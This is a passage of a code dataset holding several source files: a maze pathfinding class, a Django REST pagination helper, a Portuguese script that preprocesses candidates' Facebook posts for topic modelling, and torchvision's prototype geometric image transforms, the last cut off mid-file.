\n \n pass\n\n def checkPositions(self):\n # Define the start and end indecies of the movable pieces\n moves = {\n 1 : (1, 43),\n 2 : (3, 45),\n 3 : (5, 47),\n\n 4 : (13, 7),\n 5 : (27, 21),\n 6 : (41, 35),\n\n 7 : (47, 5),\n 8 : (45, 3),\n 9 : (43, 1),\n\n 10 : (35, 41),\n 11 : (21 ,27),\n 12 : (7, 13)\n }\n\n \n pass\n\n\n def checkNode(self):\n \n self.tree.append((self.board.piecesList[self.start], None))\n self.closedList.append(self.start)\n parentIndex = 0\n for node, pIndex in self.tree:\n if node.index == self.end:\n print (\"Goal has been found\")\n return True\n \n # Get the pieces that the player can move to from the current position\n pieceAbove, pieceRight, pieceBelow, pieceLeft = self.get4piecesAround(node.index)\n \n # The orientation to look at \n # # 0 # # 0 #\n # 3 # 1 3 # 1\n # # 2 # # 2 #\n \n # # 0 # # 0 #\n # 3 # 1 3 # 1\n # # 2 # # 2 #\n \n # Look up \n if pieceAbove is not None:\n if pieceAbove.orientation[2] == 1 and node.orientation[0] == 1:\n if not self.inClosedList(pieceAbove.index): \n self.tree.append((pieceAbove, parentIndex))\n self.closedList.append(pieceAbove.index)\n\n # Look down \n if pieceBelow is not None:\n if pieceBelow.orientation[0] == 1 and node.orientation[2] == 1:\n if not self.inClosedList(pieceBelow.index): \n self.tree.append((pieceBelow, parentIndex))\n self.closedList.append(pieceBelow.index)\n \n # Look right\n if pieceRight is not None:\n if pieceRight.orientation[3] == 1 and node.orientation[1] == 1:\n if not self.inClosedList(pieceRight.index): \n self.tree.append((pieceRight, parentIndex))\n self.closedList.append(pieceRight.index)\n\n # Look left\n if pieceLeft is not None:\n if pieceLeft.orientation[1] == 1 and node.orientation[3] == 1:\n if not self.inClosedList(pieceLeft.index): \n self.tree.append((pieceLeft, parentIndex))\n self.closedList.append(pieceLeft.index)\n \n parentIndex += 1\n print (\"Could not find goal\")\n return False\n \n\n def inClosedList(self, index):\n for i in self.closedList:\n if i == index:\n return True\n return False \n \n def getPath(self):\n idx = 0\n for i in range(len(self.tree) - 1, 0, - 1):\n if self.tree[i][0].index == self.end: \n idx = self.tree[i][1]\n self.finalPath.append(self.tree[i][0])\n break\n \n # for piece, parent in self.tree:\n # print (\"Piece position = \" + str(piece.position) + \", parent index: \" + str(parent) + \", index: \" + str(piece.index))\n\n while idx is not None:\n self.finalPath.append(self.tree[idx][0])\n idx = self.tree[idx][1]\n pass\n\n # for piece in self.finalPath:\n # print (piece.index)\n\n def drawPath(self, display):\n for i in range (len (self.finalPath) - 1):\n startpos = self.finalPath[i].position[0] + int(DEFAULT_IMAGE_SIZE[0] / 2), self.finalPath[i].position[1] + int(DEFAULT_IMAGE_SIZE[1] / 2)\n endpos = self.finalPath[i + 1].position[0] + int(DEFAULT_IMAGE_SIZE[0] / 2), self.finalPath[i + 1].position[1] + int(DEFAULT_IMAGE_SIZE[1] / 2)\n pygame.draw.line(display, (255,0,0), startpos, endpos, 4)\n\n def get4piecesAround(self, index):\n above = self.board.piecesList[index - 7] if index > 6 else None \n rightSide = self.board.piecesList[index + 1] if index % 7 < 6 else None\n below = self.board.piecesList[index + 7] if index < 42 else None\n leftSide = self.board.piecesList[index - 1] if index % 7 > 0 else None \n return above, rightSide, below, 
leftSide","repo_name":"pater18/Labyrinth-AI","sub_path":"newPathFinder.py","file_name":"newPathFinder.py","file_ext":"py","file_size_in_byte":4795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30891102488","text":"from collections import OrderedDict\n\nfrom rest_framework.pagination import LimitOffsetPagination\nfrom rest_framework.response import Response\n\n\nclass ApplicationListPagination(LimitOffsetPagination):\n \"\"\"应用列表分页器,用于添加各种应用类型数量等参数\"\"\"\n\n default_limit = 12\n\n def get_paginated_response(self, data, extra_data):\n return Response(\n OrderedDict(\n [\n ('count', self.count),\n ('next', self.get_next_link()),\n ('previous', self.get_previous_link()),\n ('extra_data', extra_data),\n ('results', data),\n ]\n )\n )\n","repo_name":"TencentBlueKing/blueking-paas","sub_path":"apiserver/paasng/paasng/platform/applications/pagination.py","file_name":"pagination.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"32"} +{"seq_id":"72950111451","text":"#coding: utf-8 \n# livia_miraanda\nfrom datetime import datetime\nfrom nltk.stem.snowball import SnowballStemmer\nimport json,re,nltk,gzip,string,unicodedata,time\n\n#===============================================================================\n# excecao desenvolvida para ser lancada quando um post nao tiver mensagem textual\n#===============================================================================\nclass PostWithoutMessageException(Exception):\n pass\n\n#===============================================================================\n# remove urls\n#===============================================================================\ndef remove_url(text):\n return re.sub(r\"http\\S+\", \"\", text)\n\n#===============================================================================\n# remove numeros no texto\n#===============================================================================\ndef remove_numbers(text):\n return re.sub(r'\\d+','',text)\n\n#===============================================================================\n# tokeniza o texto - 'hello world' return ['hello','world']\n#===============================================================================\ndef tokenization(text):\n return nltk.word_tokenize(text)\n\n#===============================================================================\n# converte o texto para minusculo\n#===============================================================================\ndef convert_to_lower(text):\n return text.lower()\n\n#===============================================================================\n# obter o stemming de uma lista de palavras tokenizadas\n#===============================================================================\ndef obtain_stemming(tokenized_pre_processed_message):\n stemmer = SnowballStemmer('portuguese')\n tokenized_stemmed_text = [stemmer.stem(word) for word in tokenized_pre_processed_message]\n return tokenized_stemmed_text\n\n#===============================================================================\n# remove todos simbolos dentro da lista string.punctuation\n#===============================================================================\ndef remove_symbols(tokenized_pre_processed_message):\n # ponctuations less [\\] because unicode patterns\n ponctuations = string.punctuation.replace('[\\]','')\n new_words = []\n for word in tokenized_pre_processed_message:\n new_word = ''.join([letter 
for letter \n in word if letter not in ponctuations])\n if new_word != '':\n new_words.append(new_word)\n return new_words \n\n#===============================================================================\n# remover stop words\n#===============================================================================\ndef replace_stop_words(tokenized_pre_processed_message):\n stop_words = [get_unicode_normalized(word) for word in nltk.corpus.stopwords.words('portuguese')]\n stop_words.append('link')\n stop_words.append('youtube')\n stop_words.append('sobre')\n processed_text = [word for word in tokenized_pre_processed_message\n if word not in stop_words]\n return processed_text\n\n#===============================================================================\n# substituir todos /n dentro de um texto por um espaco em branco\n#===============================================================================\ndef replace_break_lines(text):\n return text.replace('\\n', ' ')\n\n\n#===============================================================================\n# substituir todas as , dentro de um texto por um espaco em branco\n#===============================================================================\ndef replace_commas(text):\n return text.replace(',', ' ')\n\n#===============================================================================\n# funcao para chamar todas as funcoes intermediarias do pre-processamento \n#===============================================================================\ndef complete_pre_process_message(message):\n pre_processed_message = remove_url(message)\n pre_processed_message = get_unicode_normalized(pre_processed_message)\n pre_processed_message = convert_to_lower(pre_processed_message)\n pre_processed_message = replace_break_lines(pre_processed_message)\n pre_processed_message = remove_numbers(pre_processed_message)\n tokenized_pre_processed_message = tokenization(pre_processed_message)\n tokenized_pre_processed_message = replace_stop_words(tokenized_pre_processed_message)\n tokenized_pre_processed_message = remove_symbols(tokenized_pre_processed_message)\n #tokenized_pre_processed_message = obtain_stemming(tokenized_pre_processed_message)\n return tokenized_pre_processed_message\n\n#===============================================================================\n# funcao para chamar algumas funcoes intermediarias do pre-processamento \n#===============================================================================\ndef partial_pre_process_message(message):\n pre_processed_message = get_unicode_normalized(message)\n pre_processed_message = replace_commas(pre_processed_message)\n pre_processed_message = convert_to_lower(pre_processed_message)\n pre_processed_message = replace_break_lines(pre_processed_message)\n tokenized_pre_processed_message = tokenization(pre_processed_message)\n return tokenized_pre_processed_message\n\n#===============================================================================\n# retorna a lista com os posts do path passado como parametro\n #==============================================================================\ndef get_list_posts_from_path(posts_file_path):\n with gzip.open(posts_file_path) as post_file:\n post_list = post_file.readlines()\n return post_list\n\n#===============================================================================\n# normaliza os textos removendo caracteres nao ascii\n#===============================================================================\ndef get_unicode_normalized(text):\n return 
unicodedata.normalize('NFKD', text).encode('ascii', 'ignore').decode('utf8')\n\n#===============================================================================\n# retorna lista com o par chave/valor de menssagens pre-processadas\n#===============================================================================\ndef generate_list_pre_processed_posts(post_list):\n pre_processed_post_list = []\n for post in post_list:\n try:\n if not isinstance(post,dict):\n dict_post = json.loads(post)\n if not 'message' in dict_post.keys() or dict_post['message'] =='':\n raise PostWithoutMessageException('this post does not have message')\n message = dict_post[\"message\"]\n dict_post[\"pre_processed_message\"] = complete_pre_process_message(message)\n dict_post['message_min_processed'] = partial_pre_process_message(message)\n dict_post['has_textual_message'] = True\n pre_processed_post_list.append(dict_post)\n except PostWithoutMessageException as err:\n dict_post['has_textual_message'] = False\n dict_post[\"pre_processed_message\"] = ' '\n dict_post['message_min_processed'] = ' '\n pre_processed_post_list.append(dict_post)\n return pre_processed_post_list\n\n#===============================================================================\n# converte list para str - ['hello','world'] -> 'hello world'\n#===============================================================================\ndef join_tokenized_message(tokenized_message):\n if tokenized_message == None:\n return None\n elif tokenized_message == []:\n return ' '\n else:\n message_str = ' '\n message_str = message_str.join(tokenized_message)\n return message_str\n\n\ndef write_list_in_csv_file(pre_processed_post_list,output_file,facebook_page):\n with open(output_file, 'wt') as file:\n file.write('created_time,id,pre_processed_message,message_min_processed,shares,status_type,full_picture,reactions_like,reactions_haha,reactions_wow,reactions_sad,reactions_angry,reactions_love,has_textual_message,author\\n')\n for processed_post in pre_processed_post_list:\n file.write('{0},{1},{2},{3},{4},{5},{6},{7},{8},{9},{10},{11},{12},{13},{14}\\n'\n .format(str(processed_post['created_time']),\n str(processed_post['id']),\n str(join_tokenized_message(processed_post['pre_processed_message'])),\n str(join_tokenized_message(processed_post['message_min_processed'])),\n str(processed_post['shares']['count'] if ('shares' in processed_post) else 0),\n str(processed_post['status_type']),\n str(processed_post['full_picture'] if ('full_picture' in processed_post) else None),\n str(processed_post['reactions_like']['summary']['total_count']),\n str(processed_post['reactions_haha']['summary']['total_count']),\n str(processed_post['reactions_wow']['summary']['total_count']),\n str(processed_post['reactions_sad']['summary']['total_count']),\n str(processed_post['reactions_angry']['summary']['total_count']),\n str(processed_post['reactions_love']['summary']['total_count']),\n str(processed_post['has_textual_message']),\n str(facebook_page)\n )\n )\n\ndef main():\n \n #===============================================================================\n # coloque o caminho do diretorio do projeto\n #===============================================================================\n destinaton_path = '/home/lucas/UFOP/ple_2020/analise_midias_sociais/final-work'\n data_path = '{0}/data'.format(destinaton_path)\n\n facebook_pages = ['haddad','bolsonaro','ciro','amoedo','alckmin','marina','boulos']\n\n for facebook_page in facebook_pages:\n print('\\nprocess post: {0} 
\\n'.format(str(facebook_page)))\n\n posts_file_path = '{0}/{1}/all_posts.json.gz'.format(data_path, facebook_page)\n output_posts_file_path = '{0}/all_pp_posts_{1}.csv'.format(data_path, facebook_page)\n\n post_list = get_list_posts_from_path(posts_file_path)\n pre_processed_post_list = generate_list_pre_processed_posts(post_list)\n write_list_in_csv_file(pre_processed_post_list,output_posts_file_path,facebook_page)\n\n #===========================================================================\n # final logs\n #===========================================================================\n print('process finished\\n')\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"LucasPereiraMiranda/topic-modeling","sub_path":"source/python_scripts/process_posts.py","file_name":"process_posts.py","file_ext":"py","file_size_in_byte":10804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17994755595","text":"import math\nimport numbers\nimport warnings\nfrom typing import Any, cast, Dict, List, Optional, Sequence, Tuple, Type, Union\n\nimport PIL.Image\nimport torch\nfrom torchvision.ops.boxes import box_iou\nfrom torchvision.prototype import features\nfrom torchvision.prototype.transforms import functional as F, InterpolationMode, Transform\nfrom torchvision.transforms.functional import _get_perspective_coeffs\n\nfrom typing_extensions import Literal\n\nfrom ._transform import _RandomApplyTransform\nfrom ._utils import (\n _check_padding_arg,\n _check_padding_mode_arg,\n _check_sequence_input,\n _setup_angle,\n _setup_fill_arg,\n _setup_float_or_seq,\n _setup_size,\n has_all,\n has_any,\n query_bounding_box,\n query_spatial_size,\n)\n\n\nclass RandomHorizontalFlip(_RandomApplyTransform):\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n return F.horizontal_flip(inpt)\n\n\nclass RandomVerticalFlip(_RandomApplyTransform):\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n return F.vertical_flip(inpt)\n\n\nclass Resize(Transform):\n def __init__(\n self,\n size: Union[int, Sequence[int]],\n interpolation: InterpolationMode = InterpolationMode.BILINEAR,\n max_size: Optional[int] = None,\n antialias: Optional[bool] = None,\n ) -> None:\n super().__init__()\n\n self.size = (\n [size]\n if isinstance(size, int)\n else _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n )\n self.interpolation = interpolation\n self.max_size = max_size\n self.antialias = antialias\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n return F.resize(\n inpt,\n self.size,\n interpolation=self.interpolation,\n max_size=self.max_size,\n antialias=self.antialias,\n )\n\n\nclass CenterCrop(Transform):\n def __init__(self, size: Union[int, Sequence[int]]):\n super().__init__()\n self.size = _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n return F.center_crop(inpt, output_size=self.size)\n\n\nclass RandomResizedCrop(Transform):\n def __init__(\n self,\n size: Union[int, Sequence[int]],\n scale: Tuple[float, float] = (0.08, 1.0),\n ratio: Tuple[float, float] = (3.0 / 4.0, 4.0 / 3.0),\n interpolation: InterpolationMode = InterpolationMode.BILINEAR,\n antialias: Optional[bool] = None,\n ) -> None:\n super().__init__()\n self.size = _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n\n if not isinstance(scale, Sequence):\n raise TypeError(\"Scale 
should be a sequence\")\n scale = cast(Tuple[float, float], scale)\n if not isinstance(ratio, Sequence):\n raise TypeError(\"Ratio should be a sequence\")\n ratio = cast(Tuple[float, float], ratio)\n if (scale[0] > scale[1]) or (ratio[0] > ratio[1]):\n warnings.warn(\"Scale and ratio should be of kind (min, max)\")\n\n self.scale = scale\n self.ratio = ratio\n self.interpolation = interpolation\n self.antialias = antialias\n\n self._log_ratio = torch.log(torch.tensor(self.ratio))\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n height, width = query_spatial_size(flat_inputs)\n area = height * width\n\n log_ratio = self._log_ratio\n for _ in range(10):\n target_area = area * torch.empty(1).uniform_(self.scale[0], self.scale[1]).item()\n aspect_ratio = torch.exp(\n torch.empty(1).uniform_(\n log_ratio[0], # type: ignore[arg-type]\n log_ratio[1], # type: ignore[arg-type]\n )\n ).item()\n\n w = int(round(math.sqrt(target_area * aspect_ratio)))\n h = int(round(math.sqrt(target_area / aspect_ratio)))\n\n if 0 < w <= width and 0 < h <= height:\n i = torch.randint(0, height - h + 1, size=(1,)).item()\n j = torch.randint(0, width - w + 1, size=(1,)).item()\n break\n else:\n # Fallback to central crop\n in_ratio = float(width) / float(height)\n if in_ratio < min(self.ratio):\n w = width\n h = int(round(w / min(self.ratio)))\n elif in_ratio > max(self.ratio):\n h = height\n w = int(round(h * max(self.ratio)))\n else: # whole image\n w = width\n h = height\n i = (height - h) // 2\n j = (width - w) // 2\n\n return dict(top=i, left=j, height=h, width=w)\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n return F.resized_crop(\n inpt, **params, size=self.size, interpolation=self.interpolation, antialias=self.antialias\n )\n\n\nImageOrVideoTypeJIT = Union[features.ImageTypeJIT, features.VideoTypeJIT]\n\n\nclass FiveCrop(Transform):\n \"\"\"\n Example:\n >>> class BatchMultiCrop(transforms.Transform):\n ... def forward(self, sample: Tuple[Tuple[Union[features.Image, features.Video], ...], features.Label]):\n ... images_or_videos, labels = sample\n ... batch_size = len(images_or_videos)\n ... image_or_video = images_or_videos[0]\n ... images_or_videos = image_or_video.wrap_like(image_or_video, torch.stack(images_or_videos))\n ... labels = features.Label.wrap_like(labels, labels.repeat(batch_size))\n ... 
return images_or_videos, labels\n ...\n >>> image = features.Image(torch.rand(3, 256, 256))\n >>> label = features.Label(0)\n >>> transform = transforms.Compose([transforms.FiveCrop(), BatchMultiCrop()])\n >>> images, labels = transform(image, label)\n >>> images.shape\n torch.Size([5, 3, 224, 224])\n >>> labels.shape\n torch.Size([5])\n \"\"\"\n\n _transformed_types = (features.Image, PIL.Image.Image, features.is_simple_tensor, features.Video)\n\n def __init__(self, size: Union[int, Sequence[int]]) -> None:\n super().__init__()\n self.size = _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n\n def _transform(\n self, inpt: ImageOrVideoTypeJIT, params: Dict[str, Any]\n ) -> Tuple[ImageOrVideoTypeJIT, ImageOrVideoTypeJIT, ImageOrVideoTypeJIT, ImageOrVideoTypeJIT, ImageOrVideoTypeJIT]:\n return F.five_crop(inpt, self.size)\n\n def _check_inputs(self, flat_inputs: List[Any]) -> None:\n if has_any(flat_inputs, features.BoundingBox, features.Mask):\n raise TypeError(f\"BoundingBox'es and Mask's are not supported by {type(self).__name__}()\")\n\n\nclass TenCrop(Transform):\n \"\"\"\n See :class:`~torchvision.prototype.transforms.FiveCrop` for an example.\n \"\"\"\n\n _transformed_types = (features.Image, PIL.Image.Image, features.is_simple_tensor, features.Video)\n\n def __init__(self, size: Union[int, Sequence[int]], vertical_flip: bool = False) -> None:\n super().__init__()\n self.size = _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n self.vertical_flip = vertical_flip\n\n def _check_inputs(self, flat_inputs: List[Any]) -> None:\n if has_any(flat_inputs, features.BoundingBox, features.Mask):\n raise TypeError(f\"BoundingBox'es and Mask's are not supported by {type(self).__name__}()\")\n\n def _transform(\n self, inpt: Union[features.ImageType, features.VideoType], params: Dict[str, Any]\n ) -> Union[List[features.ImageTypeJIT], List[features.VideoTypeJIT]]:\n return F.ten_crop(inpt, self.size, vertical_flip=self.vertical_flip)\n\n\nclass Pad(Transform):\n def __init__(\n self,\n padding: Union[int, Sequence[int]],\n fill: Union[features.FillType, Dict[Type, features.FillType]] = 0,\n padding_mode: Literal[\"constant\", \"edge\", \"reflect\", \"symmetric\"] = \"constant\",\n ) -> None:\n super().__init__()\n\n _check_padding_arg(padding)\n _check_padding_mode_arg(padding_mode)\n\n # This cast does Sequence[int] -> List[int] and is required to make mypy happy\n if not isinstance(padding, int):\n padding = list(padding)\n self.padding = padding\n self.fill = _setup_fill_arg(fill)\n self.padding_mode = padding_mode\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n fill = self.fill[type(inpt)]\n return F.pad(inpt, padding=self.padding, fill=fill, padding_mode=self.padding_mode)\n\n\nclass RandomZoomOut(_RandomApplyTransform):\n def __init__(\n self,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = 0,\n side_range: Sequence[float] = (1.0, 4.0),\n p: float = 0.5,\n ) -> None:\n super().__init__(p=p)\n\n self.fill = _setup_fill_arg(fill)\n\n _check_sequence_input(side_range, \"side_range\", req_sizes=(2,))\n\n self.side_range = side_range\n if side_range[0] < 1.0 or side_range[0] > side_range[1]:\n raise ValueError(f\"Invalid canvas side range provided {side_range}.\")\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n orig_h, orig_w = query_spatial_size(flat_inputs)\n\n r = self.side_range[0] + torch.rand(1) * (self.side_range[1] - self.side_range[0])\n canvas_width = 
int(orig_w * r)\n canvas_height = int(orig_h * r)\n\n r = torch.rand(2)\n left = int((canvas_width - orig_w) * r[0])\n top = int((canvas_height - orig_h) * r[1])\n right = canvas_width - (left + orig_w)\n bottom = canvas_height - (top + orig_h)\n padding = [left, top, right, bottom]\n\n return dict(padding=padding)\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n fill = self.fill[type(inpt)]\n return F.pad(inpt, **params, fill=fill)\n\n\nclass RandomRotation(Transform):\n def __init__(\n self,\n degrees: Union[numbers.Number, Sequence],\n interpolation: InterpolationMode = InterpolationMode.NEAREST,\n expand: bool = False,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = 0,\n center: Optional[List[float]] = None,\n ) -> None:\n super().__init__()\n self.degrees = _setup_angle(degrees, name=\"degrees\", req_sizes=(2,))\n self.interpolation = interpolation\n self.expand = expand\n\n self.fill = _setup_fill_arg(fill)\n\n if center is not None:\n _check_sequence_input(center, \"center\", req_sizes=(2,))\n\n self.center = center\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n angle = torch.empty(1).uniform_(self.degrees[0], self.degrees[1]).item()\n return dict(angle=angle)\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n fill = self.fill[type(inpt)]\n return F.rotate(\n inpt,\n **params,\n interpolation=self.interpolation,\n expand=self.expand,\n center=self.center,\n fill=fill,\n )\n\n\nclass RandomAffine(Transform):\n def __init__(\n self,\n degrees: Union[numbers.Number, Sequence],\n translate: Optional[Sequence[float]] = None,\n scale: Optional[Sequence[float]] = None,\n shear: Optional[Union[int, float, Sequence[float]]] = None,\n interpolation: InterpolationMode = InterpolationMode.NEAREST,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = 0,\n center: Optional[List[float]] = None,\n ) -> None:\n super().__init__()\n self.degrees = _setup_angle(degrees, name=\"degrees\", req_sizes=(2,))\n if translate is not None:\n _check_sequence_input(translate, \"translate\", req_sizes=(2,))\n for t in translate:\n if not (0.0 <= t <= 1.0):\n raise ValueError(\"translation values should be between 0 and 1\")\n self.translate = translate\n if scale is not None:\n _check_sequence_input(scale, \"scale\", req_sizes=(2,))\n for s in scale:\n if s <= 0:\n raise ValueError(\"scale values should be positive\")\n self.scale = scale\n\n if shear is not None:\n self.shear = _setup_angle(shear, name=\"shear\", req_sizes=(2, 4))\n else:\n self.shear = shear\n\n self.interpolation = interpolation\n self.fill = _setup_fill_arg(fill)\n\n if center is not None:\n _check_sequence_input(center, \"center\", req_sizes=(2,))\n\n self.center = center\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n height, width = query_spatial_size(flat_inputs)\n\n angle = torch.empty(1).uniform_(self.degrees[0], self.degrees[1]).item()\n if self.translate is not None:\n max_dx = float(self.translate[0] * width)\n max_dy = float(self.translate[1] * height)\n tx = int(round(torch.empty(1).uniform_(-max_dx, max_dx).item()))\n ty = int(round(torch.empty(1).uniform_(-max_dy, max_dy).item()))\n translate = (tx, ty)\n else:\n translate = (0, 0)\n\n if self.scale is not None:\n scale = torch.empty(1).uniform_(self.scale[0], self.scale[1]).item()\n else:\n scale = 1.0\n\n shear_x = shear_y = 0.0\n if self.shear is not None:\n shear_x = torch.empty(1).uniform_(self.shear[0], self.shear[1]).item()\n if len(self.shear) == 4:\n 
shear_y = torch.empty(1).uniform_(self.shear[2], self.shear[3]).item()\n\n shear = (shear_x, shear_y)\n return dict(angle=angle, translate=translate, scale=scale, shear=shear)\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n fill = self.fill[type(inpt)]\n return F.affine(\n inpt,\n **params,\n interpolation=self.interpolation,\n fill=fill,\n center=self.center,\n )\n\n\nclass RandomCrop(Transform):\n def __init__(\n self,\n size: Union[int, Sequence[int]],\n padding: Optional[Union[int, Sequence[int]]] = None,\n pad_if_needed: bool = False,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = 0,\n padding_mode: Literal[\"constant\", \"edge\", \"reflect\", \"symmetric\"] = \"constant\",\n ) -> None:\n super().__init__()\n\n self.size = _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n\n if pad_if_needed or padding is not None:\n if padding is not None:\n _check_padding_arg(padding)\n _check_padding_mode_arg(padding_mode)\n\n self.padding = F._geometry._parse_pad_padding(padding) if padding else None # type: ignore[arg-type]\n self.pad_if_needed = pad_if_needed\n self.fill = _setup_fill_arg(fill)\n self.padding_mode = padding_mode\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n padded_height, padded_width = query_spatial_size(flat_inputs)\n\n if self.padding is not None:\n pad_left, pad_right, pad_top, pad_bottom = self.padding\n padded_height += pad_top + pad_bottom\n padded_width += pad_left + pad_right\n else:\n pad_left = pad_right = pad_top = pad_bottom = 0\n\n cropped_height, cropped_width = self.size\n\n if self.pad_if_needed:\n if padded_height < cropped_height:\n diff = cropped_height - padded_height\n\n pad_top += diff\n pad_bottom += diff\n padded_height += 2 * diff\n\n if padded_width < cropped_width:\n diff = cropped_width - padded_width\n\n pad_left += diff\n pad_right += diff\n padded_width += 2 * diff\n\n if padded_height < cropped_height or padded_width < cropped_width:\n raise ValueError(\n f\"Required crop size {(cropped_height, cropped_width)} is larger than \"\n f\"{'padded ' if self.padding is not None else ''}input image size {(padded_height, padded_width)}.\"\n )\n\n # We need a different order here than we have in self.padding since this padding will be parsed again in `F.pad`\n padding = [pad_left, pad_top, pad_right, pad_bottom]\n needs_pad = any(padding)\n\n needs_vert_crop, top = (\n (True, int(torch.randint(0, padded_height - cropped_height + 1, size=())))\n if padded_height > cropped_height\n else (False, 0)\n )\n needs_horz_crop, left = (\n (True, int(torch.randint(0, padded_width - cropped_width + 1, size=())))\n if padded_width > cropped_width\n else (False, 0)\n )\n\n return dict(\n needs_crop=needs_vert_crop or needs_horz_crop,\n top=top,\n left=left,\n height=cropped_height,\n width=cropped_width,\n needs_pad=needs_pad,\n padding=padding,\n )\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n if params[\"needs_pad\"]:\n fill = self.fill[type(inpt)]\n inpt = F.pad(inpt, padding=params[\"padding\"], fill=fill, padding_mode=self.padding_mode)\n\n if params[\"needs_crop\"]:\n inpt = F.crop(inpt, top=params[\"top\"], left=params[\"left\"], height=params[\"height\"], width=params[\"width\"])\n\n return inpt\n\n\nclass RandomPerspective(_RandomApplyTransform):\n def __init__(\n self,\n distortion_scale: float = 0.5,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = 0,\n interpolation: InterpolationMode = InterpolationMode.BILINEAR,\n 
p: float = 0.5,\n ) -> None:\n super().__init__(p=p)\n\n if not (0 <= distortion_scale <= 1):\n raise ValueError(\"Argument distortion_scale value should be between 0 and 1\")\n\n self.distortion_scale = distortion_scale\n self.interpolation = interpolation\n self.fill = _setup_fill_arg(fill)\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n height, width = query_spatial_size(flat_inputs)\n\n distortion_scale = self.distortion_scale\n\n half_height = height // 2\n half_width = width // 2\n bound_height = int(distortion_scale * half_height) + 1\n bound_width = int(distortion_scale * half_width) + 1\n topleft = [\n int(torch.randint(0, bound_width, size=(1,))),\n int(torch.randint(0, bound_height, size=(1,))),\n ]\n topright = [\n int(torch.randint(width - bound_width, width, size=(1,))),\n int(torch.randint(0, bound_height, size=(1,))),\n ]\n botright = [\n int(torch.randint(width - bound_width, width, size=(1,))),\n int(torch.randint(height - bound_height, height, size=(1,))),\n ]\n botleft = [\n int(torch.randint(0, bound_width, size=(1,))),\n int(torch.randint(height - bound_height, height, size=(1,))),\n ]\n startpoints = [[0, 0], [width - 1, 0], [width - 1, height - 1], [0, height - 1]]\n endpoints = [topleft, topright, botright, botleft]\n perspective_coeffs = _get_perspective_coeffs(startpoints, endpoints)\n return dict(coefficients=perspective_coeffs)\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n fill = self.fill[type(inpt)]\n return F.perspective(\n inpt,\n None,\n None,\n fill=fill,\n interpolation=self.interpolation,\n **params,\n )\n\n\nclass ElasticTransform(Transform):\n def __init__(\n self,\n alpha: Union[float, Sequence[float]] = 50.0,\n sigma: Union[float, Sequence[float]] = 5.0,\n fill: Union[features.FillType, Dict[Type, features.FillType]] = 0,\n interpolation: InterpolationMode = InterpolationMode.BILINEAR,\n ) -> None:\n super().__init__()\n self.alpha = _setup_float_or_seq(alpha, \"alpha\", 2)\n self.sigma = _setup_float_or_seq(sigma, \"sigma\", 2)\n\n self.interpolation = interpolation\n self.fill = _setup_fill_arg(fill)\n\n def _get_params(self, flat_inputs: List[Any]) -> Dict[str, Any]:\n size = list(query_spatial_size(flat_inputs))\n\n dx = torch.rand([1, 1] + size) * 2 - 1\n if self.sigma[0] > 0.0:\n kx = int(8 * self.sigma[0] + 1)\n # if kernel size is even we have to make it odd\n if kx % 2 == 0:\n kx += 1\n dx = F.gaussian_blur(dx, [kx, kx], list(self.sigma))\n dx = dx * self.alpha[0] / size[0]\n\n dy = torch.rand([1, 1] + size) * 2 - 1\n if self.sigma[1] > 0.0:\n ky = int(8 * self.sigma[1] + 1)\n # if kernel size is even we have to make it odd\n if ky % 2 == 0:\n ky += 1\n dy = F.gaussian_blur(dy, [ky, ky], list(self.sigma))\n dy = dy * self.alpha[1] / size[1]\n displacement = torch.concat([dx, dy], 1).permute([0, 2, 3, 1]) # 1 x H x W x 2\n return dict(displacement=displacement)\n\n def _transform(self, inpt: Any, params: Dict[str, Any]) -> Any:\n fill = self.fill[type(inpt)]\n return F.elastic(\n inpt,\n **params,\n fill=fill,\n interpolation=self.interpolation,\n )\n\n\nclass RandomIoUCrop(Transform):\n def __init__(\n self,\n min_scale: float = 0.3,\n max_scale: float = 1.0,\n min_aspect_ratio: float = 0.5,\n max_aspect_ratio: float = 2.0,\n sampler_options: Optional[List[float]] = None,\n trials: int = 40,\n ):\n super().__init__()\n # Configuration similar to https://github.com/weiliu89/caffe/blob/ssd/examples/ssd/ssd_coco.py#L89-L174\n self.min_scale = min_scale\n self.max_scale = max_scale\n 
